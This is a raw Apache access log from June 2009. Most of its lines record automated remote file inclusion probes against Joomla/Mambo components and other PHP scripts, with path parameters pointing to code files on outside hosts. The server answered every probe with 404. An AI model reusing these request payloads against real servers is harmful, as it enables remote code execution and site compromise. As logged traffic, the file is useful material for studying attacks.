74.6.8.112 - - [04/Jun/2009:02:33:07 -0400] "GET /logs/error_log.Q107112200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
199.120.90.222 - - [04/Jun/2009:02:33:08 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:33:12 -0400] "GET /logs/access_log.Q108121900//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:33:31 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:33:31 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:33:31 -0400] "GET /logs/access_log.Q109051700//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:33:33 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:33:33 -0400] "GET /logs/access_log.Q109051700//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:33:33 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:33:38 -0400] "GET /logs/access_log.Q108121900//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:33:40 -0400] "GET /logs/access_log.Q108121900//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:33:50 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:33:51 -0400] "GET /logs/access_log.Q108121900%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
89.188.129.126 - - [04/Jun/2009:02:34:01 -0400] "GET /logs/access_log.Q108072400/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.188.129.126 - - [04/Jun/2009:02:34:01 -0400] "GET /errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.188.129.126 - - [04/Jun/2009:02:34:01 -0400] "GET /logs/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:34:04 -0400] "GET /logs/error_log.Q108052600/config.inc.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:34:04 -0400] "GET /logs/error_log.Q109052000/config.inc.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
89.188.129.126 - - [04/Jun/2009:02:34:07 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.79.47.122 - - [04/Jun/2009:02:34:09 -0400] "GET /logs/access_log.Q109052100/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
89.223.3.98 - - [04/Jun/2009:02:34:10 -0400] "GET /logs/error_log.Q108052600/config.inc.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:34:12 -0400] "GET /logs/error_log.Q109052000/config.inc.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:34:12 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:34:12 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:34:37 -0400] "GET //db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:34:37 -0400] "GET /logs/access_log.Q109052600//db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:34:38 -0400] "GET /logs//db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:34:39 -0400] "GET //db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:34:46 -0400] "GET /logs//db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:34:46 -0400] "GET /logs/access_log.Q109052600//db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:34:47 -0400] "GET /logs/access_log.Q109051800//db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:35:03 -0400] "GET /logs/access_log.Q109051800//db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:35:56 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:35:56 -0400] "GET /logs/access_log.Q109051700//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:35:56 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:36:04 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:36:04 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:36:04 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:36:05 -0400] "GET /logs/access_log.Q108121900%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:36:07 -0400] "GET /logs/access_log.Q108121900//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:02:36:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.234.100.126 - - [04/Jun/2009:02:36:26 -0400] "GET /logs/access_log.Q109051800%20%20/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.largeface.com/gnuboard4/style/sid.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
211.234.100.126 - - [04/Jun/2009:02:36:26 -0400] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.largeface.com/gnuboard4/style/sid.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.234.100.126 - - [04/Jun/2009:02:36:26 -0400] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.largeface.com/gnuboard4/style/sid.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:36:42 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:36:43 -0400] "GET /logs/access_log.Q108121900%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:36:48 -0400] "GET /logs//db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:36:48 -0400] "GET //db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:36:48 -0400] "GET /logs/access_log.Q109053100//db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:36:56 -0400] "GET /logs/access_log.Q109052600//db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:37:01 -0400] "GET /logs//db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:37:01 -0400] "GET /logs/access_log.Q109053100//db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:37:02 -0400] "GET //db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:37:05 -0400] "GET /logs//db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:37:05 -0400] "GET //db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:37:06 -0400] "GET /logs/access_log.Q109052600%20%20//db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:37:07 -0400] "GET /logs/access_log.Q109052600//db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:37:08 -0400] "GET //db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:37:11 -0400] "GET /logs//db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:37:11 -0400] "GET /logs/access_log.Q109052600%20%20//db.php?commonpath=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
124.0.73.2 - - [04/Jun/2009:02:37:17 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
124.0.73.2 - - [04/Jun/2009:02:37:17 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.234.100.126 - - [04/Jun/2009:02:37:41 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.largeface.com/gnuboard4/style/sid.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
211.234.100.126 - - [04/Jun/2009:02:38:18 -0400] "GET /logs/access_log.Q109050300/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.largeface.com/gnuboard4/style/sid.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
89.188.129.126 - - [04/Jun/2009:02:38:22 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.188.129.126 - - [04/Jun/2009:02:38:22 -0400] "GET /logs/access_log.Q108072400%20%20/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.145.50 - - [04/Jun/2009:02:38:33 -0400] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
110.45.145.50 - - [04/Jun/2009:02:38:33 -0400] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
110.45.145.50 - - [04/Jun/2009:02:38:33 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:02:38:55 -0400] "GET /logs/access_log.Q109050300//components/com_simpleboard/file_upload.php?sbp=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
110.45.145.50 - - [04/Jun/2009:02:38:56 -0400] "GET /logs/access_log.Q109050300/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:02:39:23 -0400] "GET /logs/access_log.Q109050300/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:02:39:23 -0400] "GET /administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:02:39:23 -0400] "GET /logs/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:39:46 -0400] "GET /logs/access_log.Q109051700//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:39:47 -0400] "GET /logs/access_log.Q108121900//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
123.143.98.5 - - [04/Jun/2009:02:41:06 -0400] "GET /logs/access_log.Q109051700//?path%5Bdocroot%5D=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
123.143.98.5 - - [04/Jun/2009:02:41:06 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
123.143.98.5 - - [04/Jun/2009:02:41:10 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
123.143.98.5 - - [04/Jun/2009:02:41:12 -0400] "GET /logs/access_log.Q109051700//?path%5Bdocroot%5D=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:02:41:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.73.2 - - [04/Jun/2009:02:42:36 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
124.0.73.2 - - [04/Jun/2009:02:43:18 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
91.149.157.130 - - [04/Jun/2009:02:44:04 -0400] "GET //ashnews.php?pathtoashnews=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.149.157.130 - - [04/Jun/2009:02:44:04 -0400] "GET /logs//ashnews.php?pathtoashnews=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.149.157.130 - - [04/Jun/2009:02:44:04 -0400] "GET /logs/access_log.Q109050700//ashnews.php?pathtoashnews=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
74.6.8.112 - - [04/Jun/2009:02:44:07 -0400] "GET /logs/error_log.Q107111900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.149.157.130 - - [04/Jun/2009:02:44:16 -0400] "GET /logs/access_log.Q109053100//ashnews.php?pathtoashnews=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.149.157.130 - - [04/Jun/2009:02:44:21 -0400] "GET //ashnews.php?pathtoashnews=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
91.149.157.130 - - [04/Jun/2009:02:44:21 -0400] "GET /logs//ashnews.php?pathtoashnews=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
91.149.157.130 - - [04/Jun/2009:02:44:21 -0400] "GET /logs/access_log.Q109050700//ashnews.php?pathtoashnews=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
91.149.157.130 - - [04/Jun/2009:02:44:28 -0400] "GET /logs/access_log.Q109053100//ashnews.php?pathtoashnews=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
124.217.216.86 - - [04/Jun/2009:02:44:47 -0400] "GET /logs/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://harvestusa.org///administrator//includes/idi.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.826"
124.217.216.86 - - [04/Jun/2009:02:44:47 -0400] "GET /logs/error_log.Q109021600/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://harvestusa.org///administrator//includes/idi.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.826"
124.217.216.86 - - [04/Jun/2009:02:44:47 -0400] "GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://harvestusa.org///administrator//includes/idi.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.826"
124.217.216.86 - - [04/Jun/2009:02:44:47 -0400] "GET /logs/error_log.Q108092800/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://harvestusa.org///administrator//includes/idi.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.826"
124.217.216.86 - - [04/Jun/2009:02:44:49 -0400] "GET /logs/error_log.Q109021600/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://harvestusa.org///administrator//includes/idi.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.826"
124.217.216.86 - - [04/Jun/2009:02:44:50 -0400] "GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://harvestusa.org///administrator//includes/idi.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.826"
124.217.216.86 - - [04/Jun/2009:02:44:50 -0400] "GET /logs/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://harvestusa.org///administrator//includes/idi.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.826"
124.217.216.86 - - [04/Jun/2009:02:44:50 -0400] "GET /logs/error_log.Q108092800/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://harvestusa.org///administrator//includes/idi.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.826"
122.153.212.195 - - [04/Jun/2009:02:44:56 -0400] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:02:44:57 -0400] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:02:44:57 -0400] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:44:59 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:02:45:00 -0400] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:45:00 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:45:00 -0400] "GET /logs/access_log.Q109051700//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:45:05 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:45:05 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:45:05 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:45:08 -0400] "GET /logs/access_log.Q108121900//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:45:08 -0400] "GET /logs/access_log.Q108121900%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:45:41 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:45:43 -0400] "GET /logs/access_log.Q108121900%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:02:46:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.198.73.59 - - [04/Jun/2009:02:46:27 -0400] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
213.198.73.59 - - [04/Jun/2009:02:46:27 -0400] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
213.198.73.59 - - [04/Jun/2009:02:46:27 -0400] "GET /logs/access_log.Q109050900/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:46:56 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
